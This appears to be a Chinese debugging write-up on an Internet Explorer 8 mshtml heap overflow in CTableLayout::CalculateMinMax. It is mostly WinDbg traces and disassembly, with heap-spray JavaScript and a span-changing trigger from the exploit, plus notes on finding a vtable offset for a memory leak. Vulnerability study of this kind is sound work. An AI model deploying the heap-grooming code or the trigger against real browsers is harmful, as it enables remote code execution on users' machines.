eax=00000000 ebx=0492aea8 ecx=7741349f edx=00000000 esi=0492af38 edi=0492af38
eip=692d02f7 esp=0467e410 ebp=0467e4ac iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTableLayout::CalculateMinMax+0x1df:
692d02f7 85c0            test    eax,eax
1:025> dd ebx+9c
0492af44  07e20f90 00000000 00000000 00000000
0492af54  00000000 00000000 00000000 00000000
0492af64  00000000 000000c8 000000c8 00000000
0492af74  00000000 00000000 00000000 00000000
0492af84  00000000 00000000 00000000 00000000
0492af94  00000000 00000000 00000000 00000000
0492afa4  00000000 00000000 00000000 ffffffff
0492afb4  00000001 00000000 00000000 00000000
1:025> dd 07e20f90 
07e20f90  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
07e20fa0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
07e20fb0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
07e20fc0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
07e20fd0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
07e20fe0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
07e20ff0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
07e21000  ???????? ???????? ???????? ????????

1:025> !heap -p -a 07e20f90 
    address 07e20f90 found in
    _DPH_HEAP_ROOT @ 171000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                 7e71f70:          7e20f90               70 -          7e20000             2000

此外,我们看一下用于比较的spansum和spancmp

1:025> dd ebx+54
0492aefc  00000001 00000000 ffffffff 00000000
0492af0c  ffffffff 691c9fd0 00000004 00000004
0492af1c  0497eff0 691c9fd0 00000004 00000004
0492af2c  04936ff0 00000000 00000000 691c9fd0
0492af3c  00000000 00000004 07f27f90 00000000
0492af4c  00000000 00000000 00000000 00000000
0492af5c  00000000 00000000 00000000 000000c8
0492af6c  000000c8 00000000 00000000 00000000
1:025> dd ebx+94
0492af3c  00000000 00000004 07f27f90 00000000
0492af4c  00000000 00000000 00000000 00000000
0492af5c  00000000 00000000 00000000 000000c8
0492af6c  000000c8 00000000 00000000 00000000
0492af7c  00000000 00000000 00000000 00000000
0492af8c  00000000 00000000 00000000 00000000
0492af9c  00000000 00000000 00000000 00000000
0492afac  00000000 ffffffff 00000001 00000000

从上面的代码段可知,这里分配了0x70大小的内存地址在CtableLayout+0x9C指向的地址。
总结:

  • CtableLayout::CalculateMinMax的第一个参数为CtableLayout对象,即table标签在内存中的对象。
  • CtableLayout+0x54:span属性值和spansum
  • CtableLayout+0x9C: 保存vulheap,至少分配0x70字节的内存
  • CtableLayout+0x94:用于和spansum比较的spancmp,当spancmp>>2小于spansum才分配漏洞堆块。

要注意的地方
再次g之后会出现允许activeX允许这个框,

然后发现

这我也不知道是中间再次在哪触发了这个函数,还是重新运行了poc,总之这个时候的spansum和spancmp都没变,分别为1和0.
我觉得可能是中间又在哪触发了吧,不像是重新运行了,我也不确定是为什么,没有完整的阅读这个模块。
总之再次g之后,就和泉哥书上一致了。spansum还是1,spancmp变成4.

 

当分配完内存后,执行poc中的over_trigger函数时,会再一次断在CTableLayout::CalculateMinMax函数中,跟进去看下spansum和spancmp的值。

1:025> bl
 0 e 692d018a     0001 (0001)  1:**** mshtml!CTableLayout::CalculateMinMax
 1 e 692d02f2     0001 (0001)  1:**** mshtml!CTableLayout::CalculateMinMax+0x1d3
1:025> bc 1
1:025> bl
 0 e 692d018a     0001 (0001)  1:**** mshtml!CTableLayout::CalculateMinMax

把之前设置的多余断点删掉,注意bc后跟的是断点的标号。

1:025> g
(c84.e94): Unknown exception - code 80010108 (first chance)
(c84.e94): Unknown exception - code 80010108 (first chance)
(c84.8e8): Unknown exception - code 80010108 (first chance)
(c84.758): Unknown exception - code 80010108 (first chance)
Breakpoint 0 hit
eax=ffffffff ebx=063bbea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d018a esp=0467e4b0 ebp=0467e6c8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTableLayout::CalculateMinMax:
692d018a 8bff            mov     edi,edi
1:025> dd ebx+54
082e6efc  00000001 ffffffff ffffffff ffffffff
082e6f0c  ffffffff 691c9fd0 00000004 00000004
082e6f1c  0816bff0 691c9fd0 00000004 00000004
082e6f2c  082a2ff0 00000000 00000000 691c9fd0
082e6f3c  00000004 00000004 070f4f90 00000000
082e6f4c  00000000 00000000 00000000 00000000
082e6f5c  00000000 00000000 00000000 000000c8
082e6f6c  000000c8 00000000 00000000 00000000
1:025> dd ebx+94
082e6f3c  00000004 00000004 070f4f90 00000000
082e6f4c  00000000 00000000 00000000 00000000
082e6f5c  00000000 00000000 00000000 000000c8
082e6f6c  000000c8 00000000 00000000 00000000
082e6f7c  00000000 00000000 00000000 00000001
082e6f8c  00000000 00000000 00000000 00000000
082e6f9c  00000000 00000000 00000000 00000000
082e6fac  00000000 ffffffff 00000001 00000000

spansum为1,spancmp的值为4,(4>>2)为1==1,不发生跳转,不分配内存。

 

但是在over_trigger中,我们已经将span设置为1000了,这也是允许的最大值。
接着执行到mshtml!CTableLayout::CalculateMinMax+0x37e,我本来bp了一个断点在这,然后g一下,可是并没有断下来(这里没有断下来应该还是我断点下错了,没有进入那个断点的语句块),所以没办法,单步p呗,然后发现了新姿势,p 10能一次10下。

1:025> p
eax=08864fd0 ebx=082e6ea8 ecx=00000032 edx=00000000 esi=04f47fac edi=08864fd0
eip=69465a2e esp=0467e410 ebp=0467e4ac iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTableLayout::CalculateMinMax+0x37e:
69465a2e e8d445dfff      call    mshtml!CTableCol::GetAAspan (6925a007)--->获取span列数,此处返回1
1:025> p
eax=00000001-->返回值 ebx=082e6ea8 ecx=00000002 edx=082d0ff0 esi=04f47fac edi=08864fd0
eip=69465a33 esp=0467e410 ebp=0467e4ac iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x383:
69465a33 3de8030000      cmp     eax,3E8h--->span最多为1000
1:025> p
eax=00000001 ebx=082e6ea8 ecx=00000002 edx=082d0ff0 esi=04f47fac edi=08864fd0
eip=69465a38 esp=0467e410 ebp=0467e4ac iopl=0         nv up ei ng nz ac po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000293
mshtml!CTableLayout::CalculateMinMax+0x388:
69465a38 894510          mov     dword ptr [ebp+10h],eax ss:0023:0467e4bc=00000000
1:025> p
eax=00000001 ebx=082e6ea8 ecx=00000002 edx=082d0ff0 esi=04f47fac edi=08864fd0
eip=69465a3b esp=0467e410 ebp=0467e4ac iopl=0         nv up ei ng nz ac po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000293
mshtml!CTableLayout::CalculateMinMax+0x38b:
69465a3b 7c07            jl      mshtml!CTableLayout::CalculateMinMax+0x394 (69465a44) [br=1]

在mshtml!CTableCol::GetAAspan下断点,让它第二次获取span值的时候断下来。

1:025> bp mshtml!CTableCol::GetAAspan
1:025> g
Breakpoint 0 hit
eax=ffffffff ebx=082e6ea8 ecx=00402c02 edx=ffffffff esi=00000000 edi=0467df24
eip=692d018a esp=0467dcc8 ebp=0467dee0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTableLayout::CalculateMinMax:
692d018a 8bff            mov     edi,edi
1:025> g
Breakpoint 1 hit
eax=08864fd0 ebx=082e6ea8 ecx=00000032 edx=00000000 esi=04f47fac edi=08864fd0
eip=6925a007 esp=0467dc24 ebp=0467dcc4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CTableCol::GetAAspan:
6925a007 8bff            mov     edi,edi
1:025> gu
eax=000003e8--->返回值,此时span的值已经是0x3e8即最大值1000了 ebx=082e6ea8 ecx=00000002 edx=082d0ff0 esi=04f47fac edi=08864fd0
eip=69465a33 esp=0467dc28 ebp=0467dcc4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x383:
69465a33 3de8030000      cmp     eax,3E8h

gu是执行到当前函数结束返回。
此时span的值已经是0x3e8即最大值1000了。
继续分析后续代码。

text:74EC5AB3                 call    ?GetPixelWidth@CWidthUnitValue@@QBEHPBVCDocInfo@@PAVCElement@@H@Z ; CWidthUnitValue::GetPixelWidth(CDocInfo const *,CElement *,int)
.text:74EC5AB8                 cmp     [ebp+var_5C], 0
.text:74EC5ABC                 mov     [ebp+var_2C], eax;--->计算width得到copydata=width*100
....
...
...
.text:74EC5B3E                 mov     eax, [ebp+arg_8];----->span=1000
.text:74EC5B41                 imul    ecx, 1Ch---->1000*0x1C
.text:74EC5B44                 add     [ebp+var_38], eax
.text:74EC5B47                 mov     [ebp+var_20], ecx
.text:74EC5B4A                 jmp     short loc_74EC5B4F;---->vulheap地址
.text:74EC5B4C ; ---------------------------------------------------------------------------
.text:74EC5B4C
.text:74EC5B4C loc_74EC5B4C:                           ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+195A11j
.text:74EC5B4C                 mov     ecx, [ebp+var_20]
.text:74EC5B4F
.text:74EC5B4F loc_74EC5B4F:                           ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+1959C0j
.text:74EC5B4F                 mov     eax, [ebx+9Ch];---->vulheap地址
.text:74EC5B55                 add     eax, ecx;----->offset=vulheap+1000*0x1c>0x70(vulheap大小),最终会导致堆溢出!
.text:74EC5B57                 cmp     [ebp+var_1C], 0
.text:74EC5B5B                 mov     [ebp+var_24], eax;---->作为后面AdjustForCol函数的参数
.text:74EC5B5E                 jz      short loc_74EC5B7A
.text:74EC5B60                 mov     eax, [ebp+arg_8]
.text:74EC5B63                 cmp     eax, 1
.text:74EC5B66                 jle     short loc_74EC5B7A
.text:74EC5B68                 dec     eax
.text:74EC5B69                 cmp     [ebp+var_14], eax
.text:74EC5B6C                 jnz     short loc_74EC5B7A
.text:74EC5B6E                 imul    eax, [ebp+var_C]
.text:74EC5B72                 mov     ecx, [ebp+var_2C]
.text:74EC5B75                 sub     ecx, eax        ; this
.text:74EC5B77                 mov     [ebp+var_C], ecx
.text:74EC5B7A                 push    [ebp+var_3C]    ; struct CCalcInfo *
.text:74EC5B7D                 mov     eax, [ebp+var_34]
.text:74EC5B80                 push    [ebp+arg_4]     ; int
.text:74EC5B83                 mov     esi, [ebp+var_24]
.text:74EC5B86                 push    [ebp+var_C]     ; ---->前面经width计算得到的Copydata,即用于复制到vulheap的数据内容。
.text:74EC5B89                 call    ?AdjustForCol@CTableColCalc@@QAEXPBVCWidthUnitValue@@HPAVCCalcInfo@@H@Z ; CTableColCalc::AdjustForCol(CWidthUnitValue const *,int,CCalcInfo *,int)

复制的内容相当于width * 100得到的数值,比如此处为0x41,则复制内容为0x41 * 1000=0x1004
在AdjustForCol中,会以1000 * 0x1c位计数循环向vulheap写入数据,最终造成heap溢出。
再g就崩溃了。


总结

  1. 当页面加载,CTableLayout::CalculateMinMax被首次调用,col的span属性被初始化为1,此时spansum=1,spancmp=0
  2. 由于(spancmp>>2)<spansum,即0<1,调用EnsureSizeWorker函数分配大小为0x1c * spansum的内存,但至少分配0x1C * 4=0x70大小的内存块。
  3. 分配内存后,spancmp=spansum * 4 = 4,此时(spancmp>>2)==spansum,即4/4==1,因此不再分配内存
  4. 调用over_trigger,CTableLayout::MinMax第二次被调用,但spansum和spancmp未变,而span被更改为1000,在复制内容为width * 100的数据到分配缓冲区时,会以span为循环计数器写vulheap堆块,但是1000 * 0x1C > 0x70,最终造成堆溢出。

经过调试,泉哥142页shr eax,2理解错了,那个shr是右移的意思,而泉哥写的是左移运算符<<

实现漏洞利用

漏洞利用的原理方面,vupen的文章写的比漏洞战争书上要详细好懂一些,可以先看这个。
此外,关于exp的编写请参考漏洞战争,这里只做调试分析。

<div id="test"></div>
        <script language='javascript'>

        var leak_index = -1;

        var dap = "EEEE";
        while ( dap.length < 480 ) dap += dap;

        var padding = "AAAA";
        while ( padding.length < 480 ) padding += padding;

        var filler = "BBBB";
        while ( filler.length < 480 ) filler += filler;

        //spray
        var arr = new Array();
        var rra = new Array();

        var div_container = document.getElementById("test");
        div_container.style.cssText = "display:none";

        for (var i=0; i < 500; i+=2) {

            // E
            rra[i] = dap.substring(0, (0x100-6)/2);

            // S, bstr = A
            arr[i] = padding.substring(0, (0x100-6)/2);

            // A, bstr = B
            arr[i+1] = filler.substring(0, (0x100-6)/2);

            // B
            var obj = document.createElement("button");
            div_container.appendChild(obj);

        }

        for (var i=200; i<500; i+=2 ) {
            rra[i] = null;
            CollectGarbage();
        }

        </script>

这部分主要是用来构造堆布局,构造结果如下。

然后从中间(200)开始释放EEEE...,腾出空间。
释放的位置就是为了在分配vulheap时能够占用到释放位置中的一个,当溢出时就可以占用到后面的字符串和CButtonLayout。

************* Symbol Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       srv*

************* Symbol Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       srv*

Microsoft (R) Windows Debugger Version 6.3.9600.17200 X86
Copyright (c) Microsoft Corporation. All rights reserved.

*** wait with pending attach

************* Symbol Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       srv*

************* Symbol Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       srv*
Symbol search path is: srv*
Executable search path is: srv*
ModLoad: 013c0000 01466000   C:\Program Files\Internet Explorer\iexplore.exe
(c0.ea8): Break instruction exception - code 80000003 (first chance)
eax=7ff96000 ebx=00000000 ecx=00000000 edx=77a0d23d esi=00000000 edi=00000000
eip=779a3540 esp=07abfe00 ebp=07abfe2c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!DbgBreakPoint:
779a3540 cc              int     3
0:021> .childdbg 1
Processes created by the current process will be debugged
0:021> .symfix
0:021> .reload
Reloading current modules
................................................................
...........
0:021> sxe ld:jscript
0:021> g

************* Symbol Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       srv*

************* Symbol Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       srv*
Symbol search path is: srv*
Executable search path is: srv*
(fd4.630): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=0014f620 edx=779b64f4 esi=fffffffe edi=00000000
eip=77a0e60e esp=0014f63c ebp=0014f668 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!LdrpDoDebuggerBreak+0x2c:
77a0e60e cc              int     3
1:014>  lmm jscript
start    end        module name
1:014> g
ModLoad: 6f640000 6f6f2000   C:\Windows\System32\jscript.dll
eax=0345de14 ebx=00000000 ecx=00000007 edx=00000000 esi=7ffda000 edi=0345e22c
eip=779b64f4 esp=0345e144 ebp=0345e198 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!KiFastSystemCallRet:
779b64f4 c3              ret
1:023> lmm jscript
start    end        module name
6f640000 6f6f2000   jscript    (deferred)

先通过windbg attach ie,然后打开childdbg,因为刚开始IE还没有加载jsript.dll,所以可以先设置加载jscript.dll时断下(sxe),按g运行,拖入exp。
lmm确定载入后,再对JSCollectGarbage下断(bp),然后g运行。

1:023> bp jscript!JsCollectGarbage
1:023> g
Breakpoint 0 hit
eax=0345f0f0 ebx=0345f0a0 ecx=0136e0a0 edx=6f6c8555 esi=0136ff40 edi=0345f090
eip=6f6c8555 esp=0345f050 ebp=0345f0b4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
jscript!JsCollectGarbage:
6f6c8555 a180d06d6f      mov     eax,dword ptr [jscript!g_luTls (6f6dd080)] ds:0023:6f6dd080=00000038

继续下断,找到vulheap分配的位置,具体分析参考漏洞战争。

1:023> bl
 0 e 6f6c8555     0001 (0001)  1:**** jscript!JsCollectGarbage
1:023> bd 0
1:023> bu ntdll!RtlFreeHeap ".echo free heap;db poi(esp+c) l10;g"
1:023> bu mshtml!CTableLayout::CalculateMinMax+0x16d ".echo vulheap;dd poi(ebx+9c) l4;g"
1:023> bu jscript!JsStrSubString
1:023> .logopen
Opened log file 'dbgeng.log

打开log文件做记录,另外我在jscript!JsStrSubString下了额外的断点。
此外改动一下exp,加个alert。

<script language='javascript'>
            alert(1);
            var obj_col = document.getElementById("132");
            obj_col.span = 19;

断下

.....
.....
.....
.....
free heap
0156d718  ff ff ff ff ff ff ff ff-80 32 0c 04 00 00 00 00  .........2......
free heap
040c3280  80 59 ed 69 00 00 00 00-00 00 00 00 c7 59 e9 00  .Y.i.........Y..
Breakpoint 5 hit
eax=0375f108 ebx=0375efa0 ecx=02f01318 edx=6eb289cb esi=02f05800 edi=0375f2b4
eip=6eb289cb esp=0375ef50 ebp=0375efb4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
jscript!JsStrSubstring:
6eb289cb 8bff            mov     edi,edi
1:025> .logclose
Closing open log file dbgeng.log

保存之后,最后一个vulheap就是我们要找的.

 

另外为了确定虚表偏移,直接动态找一下吧。

1:027> x mshtml!CButtonLayout::*
6a04519d          mshtml!CButtonLayout::GetThemeClassId (<no parameter info>)
6a0c0d9d          mshtml!CButtonLayout::GetInsets (<no parameter info>)
69ff3c90          mshtml!CButtonLayout::`vftable' = <no type information>
6a045499          mshtml!CButtonLayout::GetAutoSize (<no parameter info>)
6a2562f6          mshtml!CButtonLayout::HitTestContent (<no parameter info>)
6a02b4b7          mshtml!CButtonLayout::DrawClientBackground (<no parameter info>)
69ff9251          mshtml!CButtonLayout::Init (<no parameter info>)
6a045499          mshtml!CButtonLayout::GetMultiLine (<no parameter info>)
6a1c61d8          mshtml!CButtonLayout::s_layoutdesc = <no type information>
6a2562e6          mshtml!CButtonLayout::GetBtnHelper (<no parameter info>)
6a256121          mshtml!CButtonLayout::GetFocusShape (<no parameter info>)
6a1c61d1          mshtml!CButtonLayout::GetLayoutDesc (<no parameter info>)
6a256281          mshtml!CButtonLayout::DoLayout (<no parameter info>)
6a04519d          mshtml!CButtonLayout::GetWordWrap (<no parameter info>)
69ff3af8          mshtml!CButtonLayout::`vftable' = <no type information>
6a02b4f2          mshtml!CButtonLayout::DrawClient (<no parameter info>)
6a0a32da          mshtml!CButtonLayout::`scalar deleting destructor' (<no parameter info>)
6a255f61          mshtml!CButtonLayout::DrawClientBorder (<no parameter info>)
6a0a32da          mshtml!CButtonLayout::`vector deleting destructor' (<no parameter info>)
6a0c2394          mshtml!CButtonLayout::GetDefaultSize (<no parameter info>)

奇怪的是,有两个虚表,这里我也不知道为什么……

1:027> lmm mshtml
start    end        module name
69e80000 6a432000   mshtml     (pdb symbols)          C:\WinDbg\x86\sym\mshtml.pdb\5B825981E9B445BBB998A27119FF0D6E2\mshtml.pdb

69ff3af8-69e80000=0x00173af8
这和泉哥书上说的中文版win7+ie8环境中的偏移也是一致的。


然后这我就很不解了……
此外看一下vulheap。

1:026> db 03f2ae30 l101c
03f2ae30  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2ae40  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2ae50  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2ae60  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2ae70  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2ae80  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2ae90  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2aea0  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2aeb0  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2aec0  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2aed0  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2aee0  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2aef0  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2af00  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2af10  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2af20  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2af30  04 10 00 00 04 10 00 00-0c 61 81 04 00 00 00 00  .........a......
03f2af40  02 00 00 00 48 00 01 00-04 10 00 00 04 10 00 00  ....H...........
03f2af50  04 10 00 00 41 00 41 00-41 00 41 00 41 00 41 00  ....A.A.A.A.A.A.
03f2af60  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2af70  41 00 41 00 41 00 41 00-41 00 41 00 48 00 01 00  A.A.A.A.A.A.H...
03f2af80  04 10 00 00 04 10 00 00-04 10 00 00 41 00 41 00  ............A.A.
03f2af90  41 00 41 00 41 00 41 00-48 00 01 00 04 10 00 00  A.A.A.A.H.......
03f2afa0  04 10 00 00 04 10 00 00-41 00 41 00 41 00 41 00  ........A.A.A.A.
03f2afb0  41 00 41 00 48 00 01 00-04 10 00 00 04 10 00 00  A.A.H...........
03f2afc0  04 10 00 00 41 00 41 00-41 00 41 00 41 00 41 00  ....A.A.A.A.A.A.
03f2afd0  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2afe0  41 00 41 00 41 00 41 00-41 00 41 00 48 00 01 00  A.A.A.A.A.A.H...
03f2aff0  04 10 00 00 04 10 00 00-04 10 00 00 41 00 41 00  ............A.A.
03f2b000  41 00 41 00 41 00 41 00-48 00 01 00 04 10 00 00  A.A.A.A.H.......
03f2b010  04 10 00 00 04 10 00 00-41 00 41 00 41 00 41 00  ........A.A.A.A.
03f2b020  41 00 41 00 48 00 01 00-04 10 00 00 04 10 00 00  A.A.H...........
03f2b030  04 10 00 00 41 00 41 00-41 00 41 00 41 00 41 00  ....A.A.A.A.A.A.
03f2b040  48 00 01 00 41 00 00 00-20 10 d1 01 00 00 00 c2  H...A... .......
03f2b050  0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05  .a..............
03f2b060  fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00  ....B.B.B.B.B.B.
03f2b070  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b080  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b090  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b0a0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b0b0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b0c0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b0d0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b0e0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b0f0  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b100  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b110  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b120  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b130  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b140  42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00  B.B.B.B.B.B.B.B.
03f2b150  42 00 42 00 42 00 42 00-42 00 42 00 42 00 00 00  B.B.B.B.B.B.B...
03f2b160  05 10 d1 01 00 00 00 c2-c0 6a 81 04 00 00 00 00  .........j......
03f2b170  02 00 00 00 1c 00 02 05-f8 3a 8d 68 10 0b 37 01  .........:.h..7.
03f2b180  70 90 ef 03 90 3c 8d 68-01 00 00 00 00 00 00 00  p....<.h........
03f2b190  09 08 08 01 ff ff ff ff-00 00 00 00 00 00 00 00  ................
03f2b1a0  00 00 00 00 ff ff ff ff-80 00 00 00 ff ff ff ff  ................
03f2b1b0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b1c0  00 00 00 00 24 00 00 00-20 00 00 00 00 00 00 00  ....$... .......
03f2b1d0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b1e0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b1f0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b200  00 00 00 00 00 00 00 00-00 00 00 00 28 b2 f2 03  ............(...
03f2b210  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b220  01 00 00 00 01 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b230  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b240  ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff  ................
03f2b250  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b260  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
03f2b270  00 00 00 00 00 00 00 00-66 10 d1 01 00 00 00 c2  ........f.......
03f2b280  a4 30 a9 03 00 00 00 00-02 00 00 00 1c 00 02 05  .0..............
03f2b290  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2b2a0  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2b2b0  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2b2c0  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2b2d0  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2b2e0  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2b2f0  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2b300  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2b310  45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00  E.E.A.E.H.......
03f2b320  04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00  ............E.E.
03f2b330  41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00  A.E.H...........
03f2b340  04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00  ........E.E.A.E.
03f2b350  48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00  H...............
03f2b360  00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00  ....E.E.A.E.H...
03f2b370  04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00  ................
03f2b380  45 00 45 00 41 00 45 00-48 00 01 00 45 00 00 00  E.E.A.E.H...E...
03f2b390  5b 10 d1 01 00 00 00 c2-0c 61 81 04 00 00 00 00  [........a......
03f2b3a0  02 00 00 00 18 00 02 05-fa 00 00 00 41 00 41 00  ............A.A.
03f2b3b0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b3c0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b3d0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b3e0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b3f0  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b400  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b410  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b420  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b430  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b440  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b450  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b460  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b470  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
03f2b480  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
